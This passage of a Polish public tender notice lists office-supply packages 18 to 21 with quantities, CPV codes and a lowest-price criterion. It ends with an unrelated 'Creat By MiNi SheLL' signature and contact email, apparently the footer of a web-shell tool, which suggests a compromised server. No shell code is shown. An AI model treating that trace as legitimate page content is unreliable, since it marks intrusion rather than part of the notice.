<br />3. Segregator A-4 - szeroki, pokryty PCV	1 000	szt.
<br />4. Segregator A-4 - wąski, pokryty PCV	300	szt.
<br />5. Segregator A-5 - szeroki, pokryty PCV	200	szt.
<br />6. Skoroszyt plastikowy z przezroczystą okładką z grzbietem do wpinania        2 000	szt.
<br />7. Teczka tekturowa A-4 biała - bigowany grzbiet, wiązana	40 000	szt.
<br />8. Teczka do podpisu harmonijkowa  	40	szt.
<br />9. Teczka plastikowa A-4, wiązana	1 200	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET 18 - Tuby na rysunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Tuby na rysunki regulowane z PP, kolor niebieski, format A-3-A-1, od 35-62 cm 	30	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET 19 - Tablica korkowa, pinezki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Tablica korkowa 90 x 120 w ramie aluminiowej	3	szt.
<br />2. Tablica korkowa 40 x 60 w ramie aluminiowej	3	szt.
<br />3. Pinezki do tablicy korkowej	5	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET 20 - Papier uszlachetniony gruby, karton, tektura.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Papier format A-4; gramatura >200g/m2, biały, uszlachetniony, gruby                	50	arkusz
<br />2. Papier format A-3; gramatura >200g/m2, biały, uszlachetniony, gruby       	50	arkusz
<br />3. Papier format A-4; gramatura >200g/m2, tonowany, fakturowany z przeznaczeniem na dyplomy gruby  50	arkusz
<br />4. Karton format A0, biały, gruby	30	arkusz
<br />5. Karton format A0, kolorowy, gruby	20	arkusz
<br />6. Tektura szara rozm. 100 cm x 70 cm	15	arkusz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET 21 - Koperty z rozszerzonym dnem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br />1. Koperty z rozszerzonym dnem	100	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com